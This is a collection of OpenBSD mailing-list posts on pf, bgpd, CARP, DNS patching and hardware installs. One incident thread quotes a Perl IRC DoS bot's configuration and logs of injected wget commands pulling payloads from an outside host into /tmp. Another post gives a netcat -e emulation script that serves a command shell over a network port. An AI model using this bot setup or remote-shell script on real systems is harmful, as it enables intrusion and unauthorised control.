On 12. des. 2005, at 22.44, Peter Landry wrote: Hi All, We're migrating an old Microsoft ISA Server system to OpenBSD pf. First off, before I ask any questions, kudos to everyone -- Installing OpenBSD 3.8 was a very pleasant, painless experience for someone who's never used it before. Setting up pf/nat was also extraordinarily easy. The docs are great. That aside, the only thing that I haven't been able to migrate yet is ISA's ability to redirect web requests coming in on the same IP to different machines based on the host name. IE- www.a.com (IP 123.123.0.1) gets redirected to the internal IP 192.168.0.1 while www.b.com (also IP 123.123.0.1) gets redirected to the internal IP 192.168.0.2. I haven't found anything in the docs, and all the list archive questions I've found were specific to ipnat, not pf. I'm thinking that I can't do it. In that case, my options seem to be 1) use different external IP's for each website, and redirect to different internal servers based on IP 2) redirect all web traffic to the legacy ISA system, which will then redirect based on hostname. I'm hesitant to use up all our IPs for option 1, but I'm thinking option 2 is even worse... Are there any options I haven't thought of? Thanks for any advice... Peter L. You need to examine at the application layer for 'routing' such http requests, I'd take a look at reverse proxy'ing with either apache (in the base system) or squid in the packages. Either of those should be able to listen on your firewall's external interface, and forwarding http requests inbound based on HTTP1.1 hostnames within the requests. /Pete
Re: pf question
Better (IMHO) to use bgpd to suck down the 'bogon' prefixes, and then tag them for pf, see example here: http://www.cymru.com/BGP/bogon-rs.html /Pete On 29. des. 2005, at 18.32, eric wrote: On Thu, 2005-12-29 at 11:38:22 -0500, Dave Feustel proclaimed... Has anyone on the list experience with using pf to block ip addresses in the iana reserved ip address ranges list? I don't think any of us have ever thought of that. Oh wait..I may have... run this out of cron weekly #!/bin/sh #; $Id: gbogl.sh,v 1.3 2005/01/28 04:47:16 epancer Exp $ #; a small tool to grab bogon list from team cymru #; PATH="/usr/bin:/bin:/usr/sbin:/sbin" BOGONFILE="/etc/bogon.txt" BOGONURL="http://www.cymru.com/Documents/bogon-bn-nonagg.txt"; checkfile () { if [ ! -f $BOGONFILE ]; then echo "! $BOGONFILE must exist, exiting." exit 2 fi } getnewfile () { lynx -dump $BOGONURL > $BOGONFILE } fixperm () { chmod 644 $BOGONFILE } logmsg () { logger -p kern.notice "rewrote $BOGONFILE" } checkfile getnewfile fixperm logmsg exit 0 Then... table persist file "/etc/bogon.txt" Somewhere in your pf.conf.
Re: How did they get here?
Hi, Standard advise is to reinstall the o/s (3.8 ? ;-) and then _data_ only from know good backup. You could use a boot cdrom & dd off an image of the disk for later analysis if you want first. Is there some attack vector like php or such available on the machine ? maybe they used that to retrieve & write the file ? ... but access to /tmp is tricky from a chrooted httpd ! /Pete On 4. jan. 2006, at 15.50, Gaby vanhegan wrote: To begin, I'm running OpenBSD trim.chrispyfur.net 3.6 GENERIC.MP#173 i386. I have some suspect files in /tmp, and I'm fairly sure that they shouldn't be there. Only thing I can't twig is what method the attackers used to get the files into that directory. The files are: ### Microsoft Search Worm - by br0k3d ### # From the same author of LinuxDay Worm and other variants ### And: # ShellBOT # 0ldW0lf - [EMAIL PROTECTED] # - www.atrix-br.cjb.net # - www.atrix.cjb.net in /tmp/.cpanel and /tmp/.cpanel.tmp. Reading them through, they just look like IRC clients written in Perl that have some remote commands for DOS, and the likes. They connect to a chatroom and print some message or other. If anybody wants to have some fun, the main config block is: # IRC my @adms=("darkwoot", "br0k3d", "vipzen", "Nandokabala"); #nick dos administradores my @canais=("#gestapo"); my $nick='ADOLFHITLER'; # nick do bot.. c o nick jah estiveh em uso.. vai aparece com um numero radonamico no final my $ircname = 'SSSA'; chop (my $realname = `uname -a`); $servidor='irc.agitamanaus.net' unless $servidor; #servidor d irc q vai c usadu c naum for especificado no argumento my $porta='6667'; #porta do servidor d irc My question is how did these files get into the machine. I have entries in the httpd error log that look like this: --05:10:47-- http://arnold.dvclub.com.hk/phpBB2/linuxday.txt => `/tmp/.cpanel' Resolving arnold.dvclub.com.hk... done. Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... connected. HTTP request sent, awaiting response... --05:10:57-- http:// arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt => `/tmp/.cpanel.tmp' Resolving arnold.dvclub.com.hk... done. Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... failed: Connection timed out. Retrying. --05:12:13-- http://arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt (try: 2) => `/tmp/.cpanel.tmp' Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... 200 OK Length: 3,355 [text/plain] 0K ... 100% 468.05 KB/s 05:12:27 (468.05 KB/s) - `/tmp/.cpanel' saved [3355/3355] So something is clearly injecting a command into a script, and it is causing wget to run and fetch some files. There are more instances of the same thing, but they're all fetching a file from the same place (either .cpanel, .cpanel.tmp or .plesk). Because they're in the default Apache error log, the attacker must have hit a website on the machine that doesn't have an ErrorLog defined, or they hit the machine by IP instead of a hostname. I got a list of sites that have no error log (and would log to /var/www/ logs/error_log) and checked their transfer logs. None of them had any entries in them that correspond to any of the times on the wget entries, so I learn nothing from this. There are earlier entries as well, doing the same thing, but to a different site I'm going to do a bulk grep on all the web server logs to see if anything about wget turns up in any of them, and if I can then work out which script on which site is causing the problem. As far as I can tell, there is no damage, but there are some entries like these in the error logs: /tmp/x44423[1]: ^?ELF^A^A^ALinux^B^C^A<80><80>^44: not found /tmp/x44423[2]: 1?X<89>?<8D>T<81>^DP<83>??RQ??^A?: not found /tmp/x44423[4]: syntax error: `(' unexpected Am I right in thinking that these entries show somebody trying to run a Linux binary unsuccessfully? Good job I leave Linux emulation turned off... :) So, what's my next move? My daily/weekly security emails show nothing to be worried about, no changes to any system critical files or anything of that ilk. Where can I look for more information or clues? I know the machine is due for an upgrade, and that's next on my list. I would provide a dmesg but the machine has been up for a while with one full disk, so it's been pushed out of the end of the dmesg file. Gaby -- Junkets for bunterish lickspittles since 1998! http://vanhegan.net/sudoku/ http://weblog.vanhegan.net/
netcat man page: -e emulation
Hi, The traditional netcat had a -e option to "Execute the specified command, using data from the network for stdin, and sending stdout and stderr to the network..." Whilst I can understand that this option might not be desirable to be included in the binary (for security reason ?), I occasionally find it very useful, and so emulate it with a shell script: $ cat wetcat #!/bin/ksh CMD="$*" LISTEN_PORT=1234 MYPID=$$ FIFO=/tmp/${RANDOM}_${MYPID}.fifo mkfifo -m 600 $FIFO ($CMD < $FIFO ) 2>&1 | nc -l $LISTEN_PORT > $FIFO rm $FIFO If others would find it useful too, maybe it could be added to the examples section of the nc(1) man page ? /Pete
Re: Temperature
Hi, While we're on this subject, what about adding something like " sysctl -w | grep hw.sensor" to /etc/daily ? I'd consider the output of such to be as useful as the status of disk space etc. /Pete On 15. jan. 2006, at 16.25, Stuart Henderson wrote: On 2006/01/15 13:05, Ricardo Lucas wrote: anyone knows a program that monitoring the cpu temperature and hard disk temperature sysctl(8) (hw.sensors tree) is the natural place for this information, you can be alerted if it exceeds parameters with sensorsd(8). Sensors for many motherboards and SCSI safte(4) enclosures are monitored here. SMART-capable ATA drives can be monitored with atactl(8), but you will probably need further processing to get actual temperatures. rotation?! hard disk rotation - don't think so. fan rotation - hw.sensors again.
3.9beta on macppc snapshot 30-01-06: no keyboard
Hi, on my powerbook5,2 (G4 15"), runs through booting fine, but at the install,upgrade,shell prompt, the keyboard doesn't work ( but still lights the LED) dmesg is thus little tricky to aquire... /Pete
Re: 3.9beta on macppc snapshot 30-01-06: no keyboard
01488 sectors wd0(wdc1:0:0): using PIO mode 4, DMA mode 2, Ultra-DMA mode 5 "Apple UniNorth Firewire" rev 0x81 at pci2 dev 14 function 0 not configured gem0 at pci2 dev 15 function 0 "Apple Uni-N2 GMAC" rev 0x80: irq 41, address 00:0a:95:cd:87:c4 eephy0 at gem0 phy 0: Marvell 88E Gigabit PHY, rev. 1 rd0: fixed, 8192 blocks uhidev0 at uhub2 port 1 configuration 1 interface 0 uhidev0: vendor 0x05ac product 0x1000, rev 2.00/15.86, addr 2, iclass 3/1 ukbd0 at uhidev0 wskbd0 at ukbd0: console keyboard, using wsdisplay0 uhidev1 at uhub2 port 1 configuration 1 interface 1 uhidev1: vendor 0x05ac product 0x1000, rev 2.00/15.86, addr 2, iclass 3/1 uhid0 at uhidev1: input=3, output=0, feature=1 bootpath: '/[EMAIL PROTECTED]/[EMAIL PROTECTED]/[EMAIL PROTECTED]/[EMAIL PROTECTED]/3.9/macppc/bsd.rd' rootdev=0x1100 rrootdev=0x1100 rawdev=0x1102 WARNING: clock gained 6 days -- CHECK AND RESET THE DATE! uhidev2 at uhub4 port 1 configuration 1 interface 0 uhidev2: Chicony USB Keyboard, rev 1.10/1.00, addr 2, iclass 3/1 ukbd1 at uhidev2 wskbd1 at ukbd1 mux 1 wskbd1: connecting to wsdisplay0 uhidev3 at uhub4 port 1 configuration 1 interface 1 uhidev3: Chicony USB Keyboard, rev 1.10/1.00, addr 2, iclass 3/1 uhid1 at uhidev3: input=4, output=0, feature=0 ural0 at uhub5 port 1 ural0: Ralink 802.11g WLAN + Pen Drive, rev 2.00/0.01, addr 2 ural0: MAC/BBP RT2570 (rev 0x03), RF RT2526, address 00:0f:ea:61:5b:70 I'm willing to test kernels, but 'able' is questionable: currently whole HDD is HFS+ , so whilst .iso's are easiest to test, I'll try & do an install onto a USB disk to test kernels if necessary. /Pete On 6. feb. 2006, at 22.55, Miod Vallat wrote: on my powerbook5,2 (G4 15"), runs through booting fine, but at the install,upgrade,shell prompt, the keyboard doesn't work ( but still lights the LED) Can you try the latest snapshot (January 30th)? If the built-in keyboard still fails to work, can you plug an external USB keyboard to get the dmesg? And are you willing to test kernels if the problem still arises? Miod
OpenBGPD dropping sessions.
Hi I've got OpenBGPD running on 3.7, currently whenever I bring up a session with another peer the session drops to Idle as soon as a set of routes are learnt. #macros BD01="217.112.a.b" AS 64513 router-id 85.234.132.65 neighbor $BD01 { remote-as 29550 descr BD01 multihop 3 local-address 85.234.132.65 announce none } deny from any prefix 10.0.0.0/8 prefixlen >= 8 deny from any prefix 172.16.0.0/12 prefixlen >= 12 deny from any prefix 192.168.0.0/16 prefixlen >= 16 deny from any prefix 169.254.0.0/16 prefixlen >= 16 deny from any prefix 192.0.2.0/24 prefixlen >= 24 deny from any prefix 224.0.0.0/4 prefixlen >= 4 deny from any prefix 240.0.0.0/4 prefixlen >= 4 The routes in particular are Destination PeerNext-Hop MED ASPATH *i84.92.0.0 /15 195.66.224.164 195.66.224.164 90 6871 *i212.159.64.0 /18 195.66.224.164 195.66.224.164 90 6871 *i87.115.0.0 /16 195.66.224.164 195.66.224.164 90 6871 *i195.7.224.0/19 195.66.224.164 195.66.224.164 0 6871 8622 8622 *i87.114.0.0 /16 195.66.224.164 195.66.224.164 90 6871 *i87.113.0.0 /16 195.66.224.164 195.66.224.164 90 6871 *i87.112.0.0 /16 195.66.224.164 195.66.224.164 90 6871 *i212.159.0.0/19 195.66.224.164 195.66.224.164 90 6871 *i212.159.32.0 /19 195.66.224.164 195.66.224.164 90 6871 *i81.174.128.0 /17 195.66.224.164 195.66.224.164 90 6871 *i212.56.64.0/18 195.66.224.164 195.66.224.164 90 6871 *i80.229.0.0 /16 195.66.224.164 195.66.224.164 90 6871 *i212.84.96.0/19 195.66.224.164 195.66.224.164 0 6871 8622 8622 *i195.166.128.0 /19 195.66.224.164 195.66.224.164 90 6871 This behaviour has been observed when bringing sessions up against other routers too. Is there a way of getting bgpd to log more information as to why the session was torn down, rather than just logging state changes. I would speak to AS6871 about the problem but as yet I havn't worked out what's going wrong. I tried logging everything with log updates dump all in "/var/log/bgp.log" However when I look at the log with route_btoa it reveals nothing of what brought down the session. If I have left out anything pertinent beat me with a clue stick. Thanks for any help you guys can give me. Pete
Re: OpenBGPD dropping sessions.
Hi Henning > * Pete Bristow <[EMAIL PROTECTED]> [2006-02-17 12:30]: > >>I've got OpenBGPD running on 3.7, currently whenever I bring up a >>session with another peer the session drops to Idle as soon as a set of >>routes are learnt. > > > that, of course, is not normal behaviour and nothing we ever observed... > > >>This behaviour has been observed when bringing sessions up against other >>routers too. Is there a way of getting bgpd to log more information as >>to why the session was torn down, rather than just logging state >>changes. I would speak to AS6871 about the problem but as yet I havn't >>worked out what's going wrong. > > > please show the logs. bgpd does log why a sessions drops back to IDLE. > Feb 17 12:15:54 a bgpd[28123]: neighbor 217.112.a.b (BD01): state change Idle -> Connect, reason: Start Feb 17 12:15:54 a bgpd[28123]: neighbor 217.112.a.b (BD01): state change Connect -> OpenSent, reason: Connection opened Feb 17 12:15:54 a bgpd[28123]: neighbor 217.112.a.b (BD01): state change OpenSent -> OpenConfirm, reason: OPEN message received Feb 17 12:15:54 a bgpd[28123]: neighbor 217.112.a.b (BD01): state change OpenConfirm -> Established, reason: KEEPALIVE message received Feb 17 12:16:05 a bgpd[28123]: neighbor 217.112.a.b (BD01): state change Established -> Idle, reason: Connection closed Was all I got. Pete
Re: Problem with squirrelmail
On 2. mar. 2006, at 14.00, Alexander Bochmann wrote: ...on Thu, Mar 02, 2006 at 01:07:09PM +0200, Gabriel George POPA wrote: I have a small problem with squirrelmail. The problem is that users cannot read their mail messages if they are too large (though not very [..] going on? Settings from /etc/inetd.conf: # IMAP server from PINE imap2streamtcpnowaitroot/usr/sbin/imapd imapd That doesn't really explain your problem, but if you are running an imapd from inetd and have enough users, you will certainly run into the default spawn limit of 256 connections in 60 seconds. Try cranking that up to a sensible number for your environment (nowait.2048 or something). Alex. php has some system limits in php.ini , maybe you're hitting one of them ? any clues in you php_error log ? BTW, if you're only running imap for the benefit of locally hosted squirrelmail, then you can use an inetd.conf line like: 127.0.0.1:imap stream tcp nowait root/usr/local/libexec/ imapdimapd for increased security. /Pete
Re: using openbsd on zaurus
On 12. mar. 2006, at 13.37, Theo de Raadt wrote: I'm planning to buy a zaurus sl-c3200 (the latest zaurus 3xxx model). Please note that you would be the first person. None of us have the C3200 yet. I had a look at the latest zaurus snapshot directories (on ftp.openbsd.org) and saw that the choice of available pre-build packages is highly reduced compared to i386. Most stuff compiles. Much has not been tested, though Is it possible to compile and install any applications of the ports tree on a zaurus (for example firefox, thunderbird ...)? Those two are pretty unreasonable on the Zaurus. It isn't that fast, and it is somewhat lacking in memory. There is some work on minimo, but it isn't completely reliable yet. Does the ports tree system work as well on a zaurus as on the i386 platforms or may I encounter severe build problems? As I said above, it is pretty good. But you have to be reasonable about how fast and capable a Zaurus is. Hi, For faster cpu, and many built-in goodies, I believe a similar cpu (intel pxa270) is also used in the Qtek 9000 PDA: http://www.qtekcorp.com/products.aspx? Level1=1&Menu1=0&Model=22&Submenu=2 including: Intel XScale @ 520Mhz 640x480x65k touchscreen and QWERTY keyboard GSM/GPRS/UMTS radio; 802.11b radio; 64MB RAM (128MB ROM) + SDIO/MMC card for decent flash disk. mini-USB, IRDA, bluetooth. 2x loudspeakers/headphone, 1.3Mp camera. obviously I'm aware cpu != machine etc etc. I guess it would just be a case of buy 3 ( one for me, and 2 for obsd devs) and hope that sufficient documentation would prevail... /Pete
recent CARP 'fixes'
Hi, I have a pair of openbsd amd64 3.8+ boxes with a few shared carp interfaces. They were playing perfectly together until today. I upgraded one to the 20-03-06 snapshot ( the other is still at circa. 18-12-2005). Now both the boxes claim to be carp MASTERs, with obvious consequences. net.inet.carp.log=1 or tcpdump don't show any problems though. /plus39.html lists 2 carp fixes. The first releates to HMAC calc, so I disabled the carp password, without any effect. The other fix relates to a 'short' incorrect MASTER status at boot - where as mine seems to persist indefinitely. Is this an incompatability between o/s versions, or just a passing - current hiccup ? /Pete [EMAIL PROTECTED] /root> cat /var/run/dmesg.boot OpenBSD 3.9-current (GENERIC.MP) #750: Sun Mar 19 18:25:28 MST 2006 [EMAIL PROTECTED]:/usr/src/sys/arch/amd64/compile/ GENERIC.MP real mem = 2146140160 (2095840K) avail mem = 1834962944 (1791956K) using 22937 buffers containing 214822912 bytes (209788K) of memory mainbus0 (root) ipmi0 at mainbus0: version 1.5 interface KCS iobase 0xca2/2 spacing 1 mainbus0: scanning 0x98800 to 0x98bf0 for MP signature mainbus0: scanning 0x98400 to 0x987f0 for MP signature mainbus0: scanning 0xf to 0x0 for MP signature mainbus0: MP floating pointer found in bios at 0xf72f0 mainbus0: MP config table at 0x9bb20, 372 bytes long mainbus0: Intel MP Specification (Version 1.4) (AMD HAMMER ) cpu0 at mainbus0: apid 0 (boot processor) cpu0: AMD Opteron(tm) Processor 252, 2612.34 MHz cpu0: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, CFLUSH,MMX,FXSR,SSE,SSE2,SSE3,NXE,MMXX,FFXSR,LONG,3DNOW2,3DNOW cpu0: 64KB 64b/line 2-way I-cache, 64KB 64b/line 2-way D-cache, 1MB 64b/line 16-way L2 cache cpu0: ITLB 32 4KB entries fully associative, 8 4MB entries fully associative cpu0: DTLB 32 4KB entries fully associative, 8 4MB entries fully associative cpu0: calibrating local timer cpu0: apic clock running at 200MHz cpu0: kstack at 0x800067d66000 for 20480 bytes cpu0: idle pcb at 0x800067d66000, idle sp at 0x800067d6aff0 cpu1 at mainbus0: apid 1 (application processor) cpu1: AMD Opteron(tm) Processor 252, 2612.04 MHz cpu1: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, CFLUSH,MMX,FXSR,SSE,SSE2,SSE3,NXE,MMXX,FFXSR,LONG,3DNOW2,3DNOW cpu1: 64KB 64b/line 2-way I-cache, 64KB 64b/line 2-way D-cache, 1MB 64b/line 16-way L2 cache cpu1: ITLB 32 4KB entries fully associative, 8 4MB entries fully associative cpu1: DTLB 32 4KB entries fully associative, 8 4MB entries fully associative cpu1: kstack at 0x800067d6b000 for 20480 bytes cpu1: idle pcb at 0x800067d6b000, idle sp at 0x800067d6fff0 mpbios: bus 0 is type PCI mpbios: bus 1 is type PCI mpbios: bus 2 is type PCI mpbios: bus 3 is type PCI mpbios: bus 4 is type PCI mpbios: bus 128 is type PCI mpbios: bus 129 is type PCI mpbios: bus 134 is type PCI mpbios: bus 139 is type ISA ioapic0 at mainbus0 apid 2 pa 0xfec0, virtual wire mode, version 11, 24 pins ioapic1 at mainbus0 apid 3 pa 0xd800, virtual wire mode, version 11, 7 pins ioapic2 at mainbus0 apid 4 pa 0xd8001000, virtual wire mode, version 11, 7 pins ioapic0: int0 attached to ExtINT (type 0x3 flags 0x5) ioapic0: int1 attached to isa0 irq 1 (type 0x0 flags 0x5) ioapic0: int2 attached to isa0 irq 2 (type 0x0 flags 0x5) ioapic0: int3 attached to isa0 irq 3 (type 0x0 flags 0x5) ioapic0: int4 attached to isa0 irq 4 (type 0x0 flags 0x5) ioapic0: int5 attached to isa0 irq 5 (type 0x0 flags 0x5) ioapic0: int6 attached to isa0 irq 6 (type 0x0 flags 0x5) ioapic0: int7 attached to isa0 irq 7 (type 0x0 flags 0x5) ioapic0: int8 attached to isa0 irq 8 (type 0x0 flags 0x5) ioapic0: int9 attached to isa0 irq 9 (type 0x0 flags 0x5) ioapic0: int10 attached to isa0 irq 10 (type 0x0 flags 0xf) ioapic0: int11 attached to isa0 irq 11 (type 0x0 flags 0xf) ioapic0: int12 attached to isa0 irq 12 (type 0x0 flags 0x5) ioapic0: int13 attached to isa0 irq 13 (type 0x0 flags 0x5) ioapic0: int14 attached to isa0 irq 14 (type 0x0 flags 0x5) ioapic0: int15 attached to isa0 irq 15 (type 0x0 flags 0x5) ioapic0: int10 attached to pci0 device 2 INT_A (type 0x0 flags 0xf) ioapic0: int11 attached to pci0 device 2 INT_B (type 0x0 flags 0xf) ioapic0: int10 attached to pci0 device 8 INT_A (type 0x0 flags 0xf) ioapic0: int11 attached to pci1 device 5 INT_A (type 0x0 flags 0xf) ioapic0: int11 attached to pci2 device 0 INT_A (type 0x0 flags 0xf) ioapic0: int10 attached to pci3 device 0 INT_A (type 0x0 flags 0xf) local apic: int0 attached to ExtINT (type 0x3 flags 0x5) local apic: int1 attached to NMI (type 0x1 flags 0x5) mainbus0: MP WARNING: 160 bytes of extended entries not examined pci0 at mainbus0 bus 0: configuration mode 1 "NVIDIA nForce4 DDR" rev 0xa3 at pci0 dev 0 function 0 not configured pcib0 at pci0 dev 1 function 0 "NVIDIA nForce4 ISA" rev 0xa3 nviic0 at pci0 dev 1 function 1 &
Re: OT: App to get detailed http measurements
I've had good results with SIEGE http://www.joedog.org/ /Pete On 14 Jun 2008, at 12:55, Mikolaj Kucharski wrote: Hi, This is off topic, but does anyone know preferably commandline utility with which I could test HTTP server? What interests me is repeated connections and stats how long it took dns resolv, tcp connect, send request and finaly download of data. Really appreciate any tips. Thanks. -- best regards q#
Re: pass pasword to ssh
perhaps you could write your script in perl ? http://www.openbsd.org/4.3_packages/i386/p5-Net-SSH-Perl-1.30.tgz-long.html /Pete On 19 Jun 2008, at 16:31, Stuart Henderson wrote: On 2008-06-19, Richard Storm <[EMAIL PROTECTED]> wrote: I am writing script, that would ssh to switch and dump configuration in file. 1) Since it is switch, i have no way to make use of public key authentication, because I have no way to store pubkey on switch. Which switch? On my HP switches I can just sftp the public keys in (and fetch the config back out the same way...) What is the cleanest way to pass password to ssh? Not sure about "cleanest", but expect (in packages/ports) works ok. You can generate a script with "autoexpect" and manually edit it.
Re: OpenBSD project goals
nah, real men wrote a program to write their thesis for them ;-) /Pete On 24 Jun 2008, at 22:29, Martin Schrvder wrote: 2008/6/24 Pierre Riteau <[EMAIL PROTECTED]>: As someone already said earlier, you can write your letter in troff with mg or vi and create a postscript file from that. Real Men wrote their thesis directly in PostScript using ed. :-) Best Martin
DNS patch
Does this mean we should expect one soon ? http://securosis.com/publications/CERT%20Advisory.doc /Pete
Re: Vulnerability Note VU#800113 - Multiple DNS implementations vulnerable to cache poisoning
looks like there is some work in progress to update the in-tree BIND to 9.4.2-P1 + local tweaking, for example: http://www.openbsd.org/cgi-bin/cvsweb/src/usr.sbin/bind/lib/dns/dispatch.c?r1=1.8 As Theo points out, patience is a virtue, and it's the "+ local tweaking" above that is the reason I gratefully use OpenBSD. /Pete On 9 Jul 2008, at 16:45, Zamri Besar wrote: Good morning, Today, I'm received alert from one of my friends regarding to Vulnerability Note VU#800113 - Multiple DNS implementations vulnerable to cache poisoning. http://www.kb.cert.org/vuls/id/800113 I checked the above site, and found that most of the *BSD status are unknown. Is this bug affected OpenBSD default bind dns? I'm don't know either the above bug is similar to this thread or not. http://marc.info/?l=openbsd-misc&m=118539211412877&w=2 -- Thank you. Yours truly, Zamri Besar
Re: eeepc via usb pen
1. enable netboot in eee's BIOS settings 2. man 8 pxeboot /Pete On 23 Jul 2008, at 16:33, [EMAIL PROTECTED] wrote: Hi Sorry for the noise but I am trying to install openbsd an an eeepc via a usb pen. I have managed to install 4.(1 or 2) in the past but do not seem to be able to get the 4.3 install to boot off a pen. I know I could (hopefully) un-tar the files from the install4.3.iso mounted with loopback on another *nix and copy the fs then configure everything and dd the mbr (or something like that); the closest i have got is a kernel panic saying boot too old upgrade when I try to boot bsd.rd via grub. But is there an easier way (without buying a usb cdrom) to boot the usb pen as a install source or take any action in reliance on its content. *** *** This email has been checked for known viruses. ***
Re: Is it necessary to recompile OS to apply security patch?
Hi, Assuming the box is only a DNS server, then the simplest & easiest (in my option) is to take a copy of the DNS related files: - /etc/rc.conf.local - /var/named/* - noting also IP address, hostname etc etc and then reinstall the o/s from a recent snapshot (downloaded here ftp://ftp.openbsd.org/pub/OpenBSD/snapshots/ or mirror), which has all the patches pre-applied. Then restore the above files. job done. if you're paranoid and unexperienced in unix, then grab a spare machine to do a dry run on that. /Pete On 29 Jul 2008, at 18:16, skogzort wrote: Hello, I know nothing/very little about OpenBSD or UNIX. I have been tasked with updating our OpenBSD DNS server with a security fix (Vulnerability Note VU#800113- Multiple DNS implementations vulnerable to cache poisoning). In order to do this it appears that I have to download the source code re-compile the entire OS. Recompiling the OS seems to involve a lot of steps. Before I continue to read through them all, I just want to confirm that it is actually necessary to do all of this, simply to apply a security patch: Down load the tree.. Pre load the tree.. Build the Kernel.. Build the userland.. Etc. The only thing we use the server for is DNS. I dont know what flavor we are running, since its on a production server I assume it will be * release or * stable, either way from what Ive read so far it looks like in order to apply this security patch I will have to update it to * stable, which seems to require that the entire OS be recompiled. Is this correct? Is it true that the only way to apply this patch is to recompile the entire OS, and go through all the steps above? I dont mind doing all this since it will give me a chance to learn, its just that the more steps I have to take, the more chances there are for mistakes. I want to be sure that the way I plan to do the update is the simplest. Im only familiar with Windows, where you just push a button to apply a security patch and you dont even have to reboot the server, so I was thinking that I may be misunderstanding what Im reading. Thanks very much for your time and any info Kyle
nagios check_via_ssh on (chroot) OpenBSD
Does anyone have it running in nagios chroot environment ? [EMAIL PROTECTED] /> ldd /usr/local/libexec/nagios/check_by_ssh /usr/local/libexec/nagios/check_by_ssh: StartEnd Type Open Ref GrpRef Name exe 10 0 /usr/local/libexec/ nagios/check_by_ssh 052b6000 252ba000 rlib 01 0 /usr/local/lib/ libintl.so.4.0 0e276000 2e352000 rlib 01 0 /usr/local/lib/ libiconv.so.4.0 0e739000 2e76d000 rlib 01 0 /usr/lib/libc.so.43.0 0fc4 0fc4 rtld 01 0 /usr/libexec/ld.so perhaps like the ssh libraries are not needed, but where should the ssh keys be put ? [EMAIL PROTECTED] />grep nagios /etc/passwd _nagios:*:550:550:Nagios user:/var/www/nagios:/sbin/nologin in /var/www/nagios/.ssh/ ? TiA, Pete Vickers [EMAIL PROTECTED] | +47 48 17 91 00 SystemNet AS
Re: Using trunk(4) to put a router in a switch ring
1. create a layer 2 (switched) ring, using spanning tree. - completely independent of openbsd box 2. connect your (dual NIC) openbsd box to 2 separate switches for redundancy, and add both NICs to a trunk group. - redundancy of switch, cabling and NICs. [EMAIL PROTECTED] ~>ifconfig bge0 bge0: flags=8943 mtu 1500 lladdr 00:18:fe:32:1e:08 trunk: trunkdev trunk0 media: Ethernet autoselect (1000baseT full-duplex) status: active [EMAIL PROTECTED] ~>ifconfig bge1 bge1: flags=8943 mtu 1500 lladdr 00:18:fe:32:1e:08 trunk: trunkdev trunk0 media: Ethernet autoselect (1000baseT full-duplex) status: active [EMAIL PROTECTED] ~>ifconfig trunk0 trunk0: flags=8843 mtu 1500 lladdr 00:18:fe:32:1e:08 trunk: trunkproto failover trunkport bge1 active trunkport bge0 master,active groups: trunk egress media: Ethernet autoselect status: active inet 1.2.3.4 netmask 0xff00 broadcast 255.255.255.0 been using it for years: [EMAIL PROTECTED] ~>uname -a OpenBSD tug 4.0 GENERIC#1107 i386 /Pete On 22 Sep 2008, at 22:03, Stuart Henderson wrote: On 2008-09-22, Dave Wilson <[EMAIL PROTECTED]> wrote: I'm not sure if trunk or bridge are more appropriate in this case I think probably bridge with RSTP, but I'm not sure how that will play with vlans (if you use them). I'd like to do something similar, but I have vlans, and as an added twist my interconnects are over third-party vlans, and I'm not especially keen on breaking the third party's switch fabric, so I haven't risked experimenting much with this yet :)
Re: Using trunk(4) to put a router in a switch ring
well i think you could insert your dual NIC openbsd host into the switch 'ring' physically, then bridging between the 2 NICs and firing up STP, but be aware that every time you up/down an interface or reboot your openbsd box, you'll trigger an STP recalc - which is around 45sec outage across entire switch infrastructure. (This can be mitigated with PVST and RSTP somewhat). /Pete On 23 Sep 2008, at 14:51, Dave Wilson wrote: Pete Vickers wrote: 1. create a layer 2 (switched) ring, using spanning tree. - completely independent of openbsd box 2. connect your (dual NIC) openbsd box to 2 separate switches for redundancy, and add both NICs to a trunk group. - redundancy of switch, cabling and NICs. Pete, thanks for your useful and informative reply. A decent example is worth a paragraph of explanation to me :-) Whilst I would love to do as you suggest, unfortunately my switches only have 2 GbE ports each. My hope was to put the routers in the GbE ring, as otherwise my routers will be bottlenecked by plugging into 100M ports on the switches. As most of my traffic goes through the routers this would be a big issue. I suspect the only way I will really nail down what I can and cannot do will be to get some new switches and build a router and start playing around. The thing that I think is most likely to break is that I already use vlans and carp, and so I will have to work out the proper way to layer physical, bridge, vlan and carp whilst still making sure that packets keep going round the ring. Unless reyk@, porter of the rstp code for bridge, can tell me different...? SD
Re: Unified BSD?
On Mon, Nov 12, 2012 at 12:37 PM, Robin Björklin wrote: > > > Am I bat crap crazy for thinking it could be good to merge the four largest > BSD variants out there, take the best bits and pieces out of each and > create a Unified BSD? > you are not crazy for thinking this, and fortunately there is nothing prohibiting you from doing so (or a collective group of people, or company etc...). One thing you will see in the BSD Unix systems is there is quite a bit of cross pollination between projects. The largest example current example of this from my perspective is support for OpenBSD's "pf" packet filter in FreeBSD. This is a packet filter built to suit the OpenBSD developers goals, but it did not restrict FreeBSD from supporting this packet filter and hopefully both projects benefit from this collaboration (wider code exposure of the pf code, and wider choice of packet filters for FreeBSD users). My opinion is that with the current state of the BSD's this is one of its stronger suits - we have multiple projects right now building entire operating systems to suit each of the projects stated goals and developer wishes. this would be opposed to gnu/linux where you are cobbling together many disparate sources to build your distribution (some of which will have goals that may not line up with your goals). with this diversity we still cross pollinate ideas and methods, but are still allowed to spend our limited resources focusing on our projects core goals. -pete -- pete wright www.nycbug.org @nomadlogicLA
Re: Ramifications of blocking SYN+FIN TCP packets
Hi, What about Postel's 'be liberal in what you accept' ? What about peers/intermediate system that have for example bugs which accidentally set FIN flags (ISP's broken traffic shaping/limiting device anyone ?). If pf can safely cleanse such legitimate traffic, then why block it ? Blindly implementing 'orders' from PCI etc is just wrong - to do so is only encouraging such bad practices. Instead reject their demands, using whatever appeals process is available. Only when enough technical staff do so will it be fixed. All such regulations should be of the style where both of these are permitted: - "I am a stupid admin, so I'll just blindly follow them" and - "I am a competent admin, so I'll use my judgement to best protect my net" How about this, for a fun response: "We don't want to drop such 'special' traffic, since if we do so, then an attacker can deduce that we have implemented PCI guidelines, which in turn implies we have CC details online, and thus are a more attractive target' ... /Pete On 12 Mar 2009, at 10:22, J.C. Roberts wrote: On Wed, 11 Mar 2009 13:07:22 -0400 